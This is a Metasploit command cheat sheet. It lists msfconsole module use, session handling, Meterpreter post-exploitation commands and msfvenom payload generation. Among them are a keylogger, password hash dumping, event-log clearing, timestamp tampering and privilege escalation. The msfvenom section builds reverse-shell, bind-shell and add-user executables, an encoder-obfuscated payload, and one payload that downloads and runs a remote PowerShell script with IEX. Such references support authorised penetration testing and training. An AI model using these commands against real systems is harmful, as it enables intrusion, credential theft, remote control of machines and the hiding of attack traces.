msfconsole
# Start Metasploit
msfconsole
# Search for exploits or modules
search [library] [exploit] # Example: search auxiliary winrm
# Use a module
use [module_number]
# Show module options
options
# Set options
set [option] [value]
# Run the exploit
run # or: exploit (equivalent for exploit modules)
Sessions Management
# List active sessions
sessions
# Show help for session management
sessions -h
# Show verbose session details
sessions -v
# Interact with a session
sessions -i [id]
# Background the current session
background
# Name a session
sessions -n [name] -i [id]
# Kill a session
sessions -k [id]
# Kill all sessions
sessions -K
# Upgrade a session to Meterpreter
sessions -u [id]
Meterpreter
Core Commands
? # Help menu
background # Move session to background
exit # Terminate session
help # Help menu
migrate [PID] # Migrate the Meterpreter session into the process with the given PID
run [script] # Run a Meterpreter script
use [extension] # Load a Meterpreter extension
File System
cat [file] # Read and output file contents
cd [path] # Change directory
del [file] # Delete a file
download [file] # Download a file from target
edit [file] # Edit a file with vim
ls # List files in the directory
mkdir [dir] # Create a directory
pwd # Print current directory
rm [file] # Remove a file
upload [file] # Upload a file to the target
Networking
ipconfig # Display network interfaces and IPs
portfwd # Forward ports on the victim
route # View or modify routing table
System
clearev # Clear event logs
drop_token # Relinquish the currently impersonated token
execute # Execute a command
getpid # Get current process ID
getprivs # Attempt to enable all privileges available to the current process
getuid # Get current user
kill [PID] # Kill a process
ps # List running processes
reg # Interact with registry
shell # Open a command shell
sysinfo # Show system information
User Interface
enumdesktops # List accessible desktops
getdesktop # Get current desktop
idletime # Show system idle time
keyscan_start # Start keylogger
keyscan_dump # Dump keylogger data
keyscan_stop # Stop keylogger
screenshot # Take a screenshot
Privilege Escalation
getsystem # Attempt to elevate the session to SYSTEM
Password Dumping
hashdump # Dump local account password hashes from the SAM
Timestomp
timestomp # Modify file timestamps
msfvenom
# Generate a basic payload
msfvenom -p [PAYLOAD] -e [ENCODER] -f [FORMAT] -i [ENCODE_COUNT] LHOST=[IP]
# List available payloads
msfvenom -l payloads
# List available encoders
msfvenom -l encoders
# Windows reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > reverse.exe
# Windows bind shell payload
msfvenom -p windows/meterpreter/bind_tcp RHOST=[IP] LPORT=[PORT] -f exe > bind.exe
# Windows add user payload
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
# Windows CMD shell payload
msfvenom -p windows/shell/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > prompt.exe
# Execute a remote script via PowerShell
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
# Encoded payload example
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe